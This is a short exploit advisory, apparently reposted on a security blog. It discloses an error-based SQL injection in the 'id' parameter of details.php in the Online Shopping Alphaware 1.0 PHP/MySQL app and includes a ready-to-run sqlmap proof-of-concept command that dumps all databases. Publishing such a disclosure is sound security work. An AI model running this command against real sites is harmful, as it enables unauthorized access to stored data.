Online Shopping Alphaware 1.0 – Error Based SQL injection

1 December 2020

# Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection
# Exploit Author: Moaaz Taha (0xStorm)
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
# Description
This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases.

#POC
sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10

Date: 2020-12-01

CVE: N/A

Platform: PHP

ClosePlease login

About
Latest Posts

Just your average information security researcher from Delaware US.

Latest posts by RiSec.Mitch (see all)

Apple Patches Critical 0-Day Flaws Actively Exploited in The Wild - 22 June 2023
An Essential Guide to Understanding, Reporting, and Combatting Digital Threats - 28 May 2023
Busting the Myths: NCSC and ICO Expose the Truth About Incident Reporting - 11 May 2023

Share the word, let's increase Cybersecurity Awareness as we know it

Recommended: Reflected XSS bugs in Canon Medical ’s Vitrea View could expose patient info

- Sponsored -

Sponsored Offer

Unleash the Power of the Cloud: Grab $200 Credit for 60 Days on DigitalOcean!

Digital ocean free 200

Discover more infosec

Just your average information security researcher from Delaware US.

more infosec reads

Subscribe for weekly updates

explore

more

security